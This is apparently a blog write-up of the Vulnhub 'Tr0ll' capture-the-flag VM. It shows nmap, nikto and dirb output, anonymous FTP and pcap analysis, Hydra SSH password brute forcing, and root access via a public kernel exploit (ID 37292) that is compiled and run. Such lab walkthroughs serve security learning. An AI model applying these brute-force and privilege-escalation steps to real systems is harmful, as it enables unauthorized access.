Vulnhub Tr0ll
Vulnhub
Tr0ll
Alright, another machine. Let’s start with nmap like always.
nmap -sC -sS -A -p- -T 4 -Pn 192.168.1.140 -oN nmap_scan
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-26 19:38 EDT
Nmap scan report for troll (192.168.1.140)
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:38:FF:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Alright, 21 ftp, 22 ssh and a website. That’s cool. Let’s check out the ftp to start with. I’ll also search sploit the version of vsftpd just in case there’s any known exploit for that particular version… And nop. Let’s proceed.
FTP
Connected to 192.168.1.140.
220 (vsFTPd 3.0.2)
Name (192.168.1.140:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (4.2770 MB/s)
Alright so we got a pcap. Let’s see what’s going inside with wireshark.
It looks like a ftp connection, if we follow the tcp stream we get this.
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
QUIT
221 Goodbye.
So he retrieves a secret_stuff.txt ummm…
We obviously didn’t see that file in the ftp we connected to, we’ll come back
to it if something else comes up.
HTTP
So we got a webserver, let’s see what nikto has to say about it.
nikto -h 192.168.1.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.140
+ Target Hostname: 192.168.1.140
+ Target Port: 80
+ Start Time: 2017-05-26 19:49:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2017-05-26 19:49:35 (GMT-4) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We got a robots.txt ,a /secret/ folder and apache 2.4.7 running.
So the robots.txt does not contain anything good and /secret/ only has a trollish picture. This does not help. Let’s see if dirb finds something.
dirb http://192.168.1.140 /usr/share/dirb/wordlists/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 26 20:07:19 2017
URL_BASE: http://192.168.1.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.140/ ----
+ http://192.168.1.140/index.html (CODE:200|SIZE:36)
+ http://192.168.1.140/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.140/secret/
+ http://192.168.1.140/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.1.140/secret/ ----
+ http://192.168.1.140/secret/index.html (CODE:200|SIZE:37)
-----------------
END_TIME: Fri May 26 20:07:22 2017
DOWNLOADED: 9224 - FOUND: 4
Nothing good also. Well shit. Let’s go back to the ftp.
FTP part 2
So let’s spend a little bit more time on the ftp. Let’s look at the conversations.
[][tr0ll1]
There’s 4 conversations. Let’s follow each one of them. The third one has something…
Well, well, well, aren't you just a clever little devil, you almost found the
sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
So it looks like the file is more trolling. Let’s try to append sup3rs3cr3tdirlol after the url.
It leads us to another index directory, this time it has a file called roflmao.
file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24,
BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
Gah, let’s run it.
chmod +x roflmao
./roflmao
Find address 0x0856BF to proceed
Alright gdb time. After spending 20 minutes on it, i was like man this shit does not exist. And i had to append once again 0x0856BF to the url. GODDAMNIT!
Let’s go to http://192.168.1.148/0x0856BF/
There’s two folder this time.
We got a file called which_one_lol.txt and pass.txt
cat Pass.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
cat which_one_lol.txt
Good_job_:)
Well this doesn’t help much. Password for what root ?
Let’s put all of them in a file and use hydra to try them out for us on the ssh port using root as a user.
hydra -l root -P troll_pass.txt 192.168.1.140 ssh
Nop, so let’s see there’s a folder called this_folder_contains_the_password and the other one is called good_luck.
Let’s assume that the big list is usernames and which_one_lol.txt is the password. Let’s try hydra again.
hydra -V -L troll_pass.txt -P password.txt -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-26 23:20:19
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1),
~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Good_job_:)" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Good_job_:)" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Good_job_:)" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Good_job_:)" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Good_job_:)" - 5 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Good_job_:)" - 6 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Good_job_:)" - 7 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Good_job_:)" - 8 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Good_job_:)" - 9 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Good_job_:)" - 10 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Good_job_:)" - 11 of 11 [child 1]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-26 23:20:27
Nada, what is his trolling us (Once again) and the password is Pass.txt…
hydra -V -L troll_pass.txt -p "Pass.txt" -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-27 02:09:18
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1),
~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Pass.txt" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Pass.txt" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Pass.txt" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Pass.txt" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Pass.txt" - 5 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Pass.txt" - 6 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Pass.txt" - 7 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Pass.txt" - 8 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 9 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Pass.txt" - 10 of 11 [child 3]
[RE-ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 10 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 11 of 11 [child 0]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-27 02:09:32
Man this nothing. This doesn’t make any sense. So after trying for over two hours, i looked at a guide. Well…shit… overflow/Pass.txt is suppose to work.
Well i just learn that i had to use a single quote for the ‘Pass.txt’.
hydra -V -L troll_pass.txt -p 'Pass.txt' -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-27 02:15:09
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Pass.txt" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Pass.txt" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Pass.txt" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Pass.txt" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Pass.txt" - 5 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Pass.txt" - 6 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Pass.txt" - 7 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Pass.txt" - 8 of 11 [child 3]
[RE-ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 8 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 9 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Pass.txt" - 10 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 11 of 11 [child 3]
[22][ssh] host: 192.168.1.140 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-27 02:15:16
I’ll know from now on to ALWAYS FREAKING USE SINGLE QUOTES in hydra.
So we’re in.
Enumeration
Let’s see the kernel
uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
I went afk for a bit and came back to
Broadcast Message from root@trol
(somewhere) at 23:45 ...
TIMES UP LOL!
Super trollish, i saw fail2ban running in the processes.
root 912 0.0 0.5 5616 2560 ? Ss 23:11 0:00 /usr/sbin/apache2 -k start
www-data 915 0.0 0.3 228248 1992 ? Sl 23:11 0:00 /usr/sbin/apache2 -k start
www-data 916 0.0 0.3 228248 1992 ? Sl 23:11 0:00 /usr/sbin/apache2 -k start
root 1166 0.0 1.3 38660 6996 ? Sl 23:11 0:00 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid
So if i searchploit for an exploit the kernel 3.13 and 37292 seems to be able to help us out.
overflow@troll:/tmp$ gcc 37292.c
overflow@troll:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
#
And that’s it. So much trolling… Arg.. Still good game.